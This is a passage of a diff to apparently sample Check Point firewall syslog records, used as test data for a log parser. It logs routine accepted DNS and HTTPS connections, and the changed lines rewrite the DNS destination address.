rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39569"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47638"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.49.248.24"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38618"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52586"; service:"443"; service_id:"https"; src:"192.168.2.2"] 
-<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44899"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44899"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80db78,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db79,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503097"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37283"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41500"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37168"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58116"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50860"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50628"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db79,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503097"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37283"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41500"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37168"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58116"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50860"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50628"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58738"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"99.86.116.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60912"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37994"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] -<134>1 2020-03-29T17:31:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503099"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59409"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503099"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60843"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503099"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59409"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503099"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60843"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7b,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50380"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] -<134>1 2020-03-29T17:31:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503101"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47205"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503101"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38203"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; 